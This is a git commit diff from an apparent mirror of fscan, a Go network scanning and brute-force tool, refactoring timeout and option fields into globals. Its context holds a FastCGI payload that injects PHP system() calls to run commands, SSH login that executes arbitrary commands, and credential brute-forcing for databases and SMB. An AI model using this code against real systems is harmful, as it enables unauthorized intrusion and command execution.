mirror of https://github.com/qwqdanchun/fscan.git
减少info结构体大小
This commit is contained in:
parent
8e1db5995e
commit
b9b5eb9ce4
|
@ -103,7 +103,7 @@ func SmbGhost(info *common.HostInfo) error {
|
|||
}
|
||||
|
||||
func SmbGhostScan(info *common.HostInfo) error {
|
||||
ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
|
||||
ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
|
||||
addr := fmt.Sprintf("%s:%v", info.Host, port)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
|
||||
defer func() {
|
||||
|
|
|
@ -56,7 +56,7 @@ func NetBIOS(info *common.HostInfo) error {
|
|||
}
|
||||
msg += fmt.Sprintf("[*] %-15s%-5s %s\\%-15s %s", info.Host, isdc, nbname.group, nbname.unique, nbname.osversion)
|
||||
|
||||
if info.Scantype == "netbios" {
|
||||
if common.Scantype == "netbios" {
|
||||
msg += "\n-------------------------------------------\n" + nbname.msg
|
||||
}
|
||||
if len(nbname.group) > 0 || len(nbname.unique) > 0 {
|
||||
|
@ -75,16 +75,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
|
|||
payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
|
||||
}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil{
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
@ -194,16 +194,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
|
|||
func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
|
||||
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, 137)
|
||||
conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil{
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
}
|
||||
}()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
|
|
@ -23,17 +23,17 @@ func FcgiScan(info *common.HostInfo) {
|
|||
return
|
||||
}
|
||||
url := "/etc/issue"
|
||||
if info.Path != "" {
|
||||
url = info.Path
|
||||
if common.Path != "" {
|
||||
url = common.Path
|
||||
}
|
||||
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
|
||||
var reqParams string
|
||||
var cutLine = "-----ASDGTasdkk361363s-----\n"
|
||||
switch {
|
||||
case info.Command == "read":
|
||||
case common.Command == "read":
|
||||
reqParams = ""
|
||||
case info.Command != "":
|
||||
reqParams = "<?php system('" + info.Command + "');die('" + cutLine + "');?>"
|
||||
case common.Command != "":
|
||||
reqParams = "<?php system('" + common.Command + "');die('" + cutLine + "');?>"
|
||||
default:
|
||||
reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
|
||||
}
|
||||
|
@ -54,7 +54,7 @@ func FcgiScan(info *common.HostInfo) {
|
|||
env["REQUEST_METHOD"] = "GET"
|
||||
}
|
||||
|
||||
fcgi, err := New(addr, info.Timeout)
|
||||
fcgi, err := New(addr, common.Timeout)
|
||||
defer func() {
|
||||
if fcgi.rwc != nil {
|
||||
fcgi.rwc.Close()
|
||||
|
|
|
@ -22,7 +22,7 @@ func Findnet(info *common.HostInfo) error {
|
|||
|
||||
func FindnetScan(info *common.HostInfo) error {
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -31,7 +31,7 @@ func FindnetScan(info *common.HostInfo) error {
|
|||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
|
|
@ -38,7 +38,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -50,7 +50,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
|
|||
func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
|
||||
if err == nil {
|
||||
err = conn.Login(Username, Password)
|
||||
if err == nil {
|
||||
|
|
|
@ -9,14 +9,14 @@ import (
|
|||
|
||||
func MemcachedScan(info *common.HostInfo) (err error) {
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if client != nil{
|
||||
if client != nil {
|
||||
client.Close()
|
||||
}
|
||||
}()
|
||||
if err == nil {
|
||||
err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err == nil {
|
||||
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
|
||||
if err == nil {
|
||||
|
|
|
@ -12,7 +12,6 @@ func MongodbScan(info *common.HostInfo) error {
|
|||
if common.IsBrute {
|
||||
return nil
|
||||
}
|
||||
|
||||
_, err := MongodbUnauth(info)
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
|
||||
|
@ -25,7 +24,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
flag = false
|
||||
senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -34,7 +33,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
|
|
|
@ -33,7 +33,7 @@ func MS17010(info *common.HostInfo) error {
|
|||
func MS17010Scan(info *common.HostInfo) error {
|
||||
ip := info.Host
|
||||
// connecting to a host in LAN if reachable should be very quick
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -43,7 +43,7 @@ func MS17010Scan(info *common.HostInfo) error {
|
|||
//fmt.Printf("failed to connect to %s\n", ip)
|
||||
return err
|
||||
}
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
//fmt.Printf("failed to connect to %s\n", ip)
|
||||
return err
|
||||
|
|
|
@ -27,7 +27,7 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -39,11 +39,11 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
|
|||
func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
|
||||
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
|
||||
db, err := sql.Open("mssql", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
|
|
|
@ -27,7 +27,7 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -39,11 +39,11 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
|
|||
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(info.Timeout)*time.Second)
|
||||
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
|
||||
db, err := sql.Open("mysql", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
|
|
|
@ -27,7 +27,7 @@ func OracleScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -42,8 +42,8 @@ func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err
|
|||
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
|
||||
db, err := sql.Open("oracle", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
|
||||
db.SetMaxIdleConns(0)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
|
|
|
@ -27,7 +27,7 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -42,7 +42,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
|
|||
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
|
||||
db, err := sql.Open("postgres", dataSourceName)
|
||||
if err == nil {
|
||||
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
|
||||
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
|
||||
defer db.Close()
|
||||
err = db.Ping()
|
||||
if err == nil {
|
||||
|
|
|
@ -48,7 +48,7 @@ func RdpScan(info *common.HostInfo) (tmperr error) {
|
|||
|
||||
for i := 0; i < common.BruteThread; i++ {
|
||||
wg.Add(1)
|
||||
go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
|
||||
go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
|
||||
}
|
||||
|
||||
close(brlist)
|
||||
|
|
|
@ -36,7 +36,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -47,7 +47,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
|
|||
func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
||||
flag = false
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -56,7 +56,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
|||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
|
@ -87,7 +87,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
|
|||
func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
|
||||
flag = false
|
||||
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
|
||||
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
|
||||
defer func() {
|
||||
if conn != nil {
|
||||
conn.Close()
|
||||
|
@ -96,7 +96,7 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
|
|||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
|
||||
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
|
||||
if err != nil {
|
||||
return flag, err
|
||||
}
|
||||
|
|
|
@ -26,17 +26,17 @@ func Scan(info common.HostInfo) {
|
|||
Hosts = CheckLive(Hosts, common.Ping)
|
||||
fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
|
||||
}
|
||||
if info.Scantype == "icmp" {
|
||||
if common.Scantype == "icmp" {
|
||||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
var AlivePorts []string
|
||||
if info.Scantype == "webonly" {
|
||||
if common.Scantype == "webonly" {
|
||||
AlivePorts = NoPortScan(Hosts, info.Ports)
|
||||
} else {
|
||||
AlivePorts = PortScan(Hosts, info.Ports, info.Timeout)
|
||||
AlivePorts = PortScan(Hosts, info.Ports, common.Timeout)
|
||||
fmt.Println("[*] alive ports len is:", len(AlivePorts))
|
||||
if info.Scantype == "portscan" {
|
||||
if common.Scantype == "portscan" {
|
||||
common.LogWG.Wait()
|
||||
return
|
||||
}
|
||||
|
@ -49,7 +49,7 @@ func Scan(info common.HostInfo) {
|
|||
fmt.Println("start vulscan")
|
||||
for _, targetIP := range AlivePorts {
|
||||
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
|
||||
if info.Scantype == "all" || info.Scantype == "main" {
|
||||
if common.Scantype == "all" || common.Scantype == "main" {
|
||||
switch {
|
||||
case info.Ports == "135":
|
||||
AddScan(info.Ports, info, ch, &wg) //findnet
|
||||
|
@ -66,7 +66,7 @@ func Scan(info common.HostInfo) {
|
|||
AddScan("1000003", info, ch, &wg) //webtitle
|
||||
}
|
||||
} else {
|
||||
port, _ := common.PORTList[info.Scantype]
|
||||
port, _ := common.PORTList[common.Scantype]
|
||||
scantype := strconv.Itoa(port)
|
||||
AddScan(scantype, info, ch, &wg)
|
||||
}
|
||||
|
|
|
@ -20,8 +20,8 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
|
|||
flag, err := doWithTimeOut(info, user, pass)
|
||||
if flag == true && err == nil {
|
||||
var result string
|
||||
if info.Domain != "" {
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
|
||||
if common.Domain != "" {
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
|
||||
}
|
||||
|
@ -35,7 +35,7 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -52,7 +52,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, signal chan struc
|
|||
Port: 445,
|
||||
User: Username,
|
||||
Password: Password,
|
||||
Domain: info.Domain,
|
||||
Domain: common.Domain,
|
||||
Workstation: "",
|
||||
}
|
||||
|
||||
|
@ -75,7 +75,7 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
|
|||
select {
|
||||
case <-signal:
|
||||
return flag, err
|
||||
case <-time.After(time.Duration(info.Timeout) * time.Second):
|
||||
case <-time.After(time.Duration(common.Timeout) * time.Second):
|
||||
return false, errors.New("time out")
|
||||
}
|
||||
}
|
||||
|
|
|
@ -29,11 +29,11 @@ func SshScan(info *common.HostInfo) (tmperr error) {
|
|||
if common.CheckErrs(err) {
|
||||
return err
|
||||
}
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * info.Timeout) {
|
||||
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) {
|
||||
return err
|
||||
}
|
||||
}
|
||||
if info.SshKey != "" {
|
||||
if common.SshKey != "" {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
@ -45,8 +45,8 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
flag = false
|
||||
Host, Port, Username, Password := info.Host, info.Ports, user, pass
|
||||
Auth := []ssh.AuthMethod{}
|
||||
if info.SshKey != "" {
|
||||
pemBytes, err := ioutil.ReadFile(info.SshKey)
|
||||
if common.SshKey != "" {
|
||||
pemBytes, err := ioutil.ReadFile(common.SshKey)
|
||||
if err != nil {
|
||||
return false, errors.New("read key failed" + err.Error())
|
||||
}
|
||||
|
@ -62,7 +62,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
config := &ssh.ClientConfig{
|
||||
User: Username,
|
||||
Auth: Auth,
|
||||
Timeout: time.Duration(info.Timeout) * time.Second,
|
||||
Timeout: time.Duration(common.Timeout) * time.Second,
|
||||
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
|
||||
return nil
|
||||
},
|
||||
|
@ -76,16 +76,16 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
defer session.Close()
|
||||
flag = true
|
||||
var result string
|
||||
if info.Command != "" {
|
||||
combo, _ := session.CombinedOutput(info.Command)
|
||||
if common.Command != "" {
|
||||
combo, _ := session.CombinedOutput(common.Command)
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
|
||||
if info.SshKey != "" {
|
||||
if common.SshKey != "" {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
} else {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
|
||||
if info.SshKey != "" {
|
||||
if common.SshKey != "" {
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
|
||||
}
|
||||
common.LogSuccess(result)
|
||||
|
|
|
@ -38,13 +38,13 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData
|
|||
info.Url = fmt.Sprintf("https://%s", info.Host)
|
||||
default:
|
||||
host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
|
||||
protocol := GetProtocol(host, info.Timeout)
|
||||
protocol := GetProtocol(host, common.Timeout)
|
||||
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
|
||||
}
|
||||
} else {
|
||||
if !strings.Contains(info.Url, "://") {
|
||||
host := strings.Split(info.Url, "/")[0]
|
||||
protocol := GetProtocol(host, info.Timeout)
|
||||
protocol := GetProtocol(host, common.Timeout)
|
||||
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
|
||||
}
|
||||
}
|
||||
|
|
|
@ -77,6 +77,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
|||
return false, err, ""
|
||||
}
|
||||
variableMap := make(map[string]interface{})
|
||||
defer func() { variableMap = nil }()
|
||||
variableMap["request"] = req
|
||||
for _, item := range p.Set {
|
||||
k, expression := item.Key, item.Value
|
||||
|
@ -123,7 +124,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
|
|||
req.Url.Path = rule.Path
|
||||
}
|
||||
// 某些poc没有区分path和query,需要处理
|
||||
//req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
|
||||
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
|
||||
//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
|
||||
|
||||
newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, string([]rune(req.Url.Path))), strings.NewReader(rule.Body))
|
||||
|
|
|
@ -23,7 +23,7 @@ var (
|
|||
|
||||
func Inithttp(PocInfo common.PocInfo) {
|
||||
//PocInfo.Proxy = "http://127.0.0.1:8080"
|
||||
err := InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
|
||||
err := InitHttpClient(PocInfo.Num, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
|
@ -57,7 +57,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
|
|||
} else {
|
||||
return errors.New("Failed type assertion to DialContext")
|
||||
}
|
||||
}else if DownProxy != "" {
|
||||
} else if DownProxy != "" {
|
||||
if DownProxy == "1" {
|
||||
DownProxy = "http://127.0.0.1:8080"
|
||||
} else if DownProxy == "2" {
|
||||
|
@ -65,7 +65,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
|
|||
} else if !strings.Contains(DownProxy, "://") {
|
||||
DownProxy = "http://127.0.0.1:" + DownProxy
|
||||
}
|
||||
if !strings.HasPrefix(DownProxy,"socks") && !strings.HasPrefix(DownProxy,"http") {
|
||||
if !strings.HasPrefix(DownProxy, "socks") && !strings.HasPrefix(DownProxy, "http") {
|
||||
return errors.New("no support this proxy")
|
||||
}
|
||||
u, err := url.Parse(DownProxy)
|
||||
|
|
|
@ -599,13 +599,13 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
|
|||
oResp, err = ClientNoRedirect.Do(req)
|
||||
}
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
//fmt.Println("[-]DoRequest error: ",err)
|
||||
return nil, err
|
||||
}
|
||||
defer oResp.Body.Close()
|
||||
resp, err := ParseResponse(oResp)
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
fmt.Println("[-]ParseResponse error: ", err)
|
||||
return nil, err
|
||||
}
|
||||
return resp, err
|
||||
|
|
|
@ -12,19 +12,19 @@ import (
|
|||
)
|
||||
|
||||
func Parse(Info *HostInfo) {
|
||||
ParseUser(Info)
|
||||
ParseUser()
|
||||
ParsePass(Info)
|
||||
ParseInput(Info)
|
||||
ParseScantype(Info)
|
||||
}
|
||||
|
||||
func ParseUser(Info *HostInfo) {
|
||||
if Info.Username == "" && Userfile == "" {
|
||||
func ParseUser() {
|
||||
if Username == "" && Userfile == "" {
|
||||
return
|
||||
}
|
||||
|
||||
if Info.Username != "" {
|
||||
Info.Usernames = strings.Split(Info.Username, ",")
|
||||
var Usernames []string
|
||||
if Username != "" {
|
||||
Usernames = strings.Split(Username, ",")
|
||||
}
|
||||
|
||||
if Userfile != "" {
|
||||
|
@ -32,37 +32,38 @@ func ParseUser(Info *HostInfo) {
|
|||
if err == nil {
|
||||
for _, user := range users {
|
||||
if user != "" {
|
||||
Info.Usernames = append(Info.Usernames, user)
|
||||
Usernames = append(Usernames, user)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Info.Usernames = RemoveDuplicate(Info.Usernames)
|
||||
Usernames = RemoveDuplicate(Usernames)
|
||||
for name := range Userdict {
|
||||
Userdict[name] = Info.Usernames
|
||||
Userdict[name] = Usernames
|
||||
}
|
||||
}
|
||||
|
||||
func ParsePass(Info *HostInfo) {
|
||||
if Info.Password != "" {
|
||||
passs := strings.Split(Info.Password, ",")
|
||||
var PwdList []string
|
||||
if Password != "" {
|
||||
passs := strings.Split(Password, ",")
|
||||
for _, pass := range passs {
|
||||
if pass != "" {
|
||||
Info.Passwords = append(Info.Passwords, pass)
|
||||
PwdList = append(PwdList, pass)
|
||||
}
|
||||
}
|
||||
Passwords = Info.Passwords
|
||||
Passwords = PwdList
|
||||
}
|
||||
if Passfile != "" {
|
||||
passs, err := Readfile(Passfile)
|
||||
if err == nil {
|
||||
for _, pass := range passs {
|
||||
if pass != "" {
|
||||
Info.Passwords = append(Info.Passwords, pass)
|
||||
PwdList = append(PwdList, pass)
|
||||
}
|
||||
}
|
||||
Passwords = Info.Passwords
|
||||
Passwords = PwdList
|
||||
}
|
||||
}
|
||||
